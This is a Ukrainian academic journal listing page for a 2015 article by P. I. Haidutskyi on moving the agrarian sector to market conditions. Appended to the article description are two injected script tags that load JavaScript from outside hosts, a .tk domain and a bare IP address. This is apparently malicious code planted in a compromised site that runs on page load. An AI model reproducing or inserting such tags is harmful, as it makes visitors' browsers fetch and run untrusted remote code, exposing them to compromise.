ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631
Наукове забезпечення розвитку агропромислового комплексу

Трансформація аграрного сектору економіки до ринкових умов господарювання / Гайдуцький П.І. // Економіка АПК. - 2015. - № 11 - С. 5

Трансформація аграрного сектору економіки до ринкових умов господарювання (Доповідь на Вченій раді Інституту економіки та прогнозування НАН України, 1 жовтня 2015 р., представленої на здобуття Державної премії в галузі науки і техніки)<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Читати статтю: 3.pdf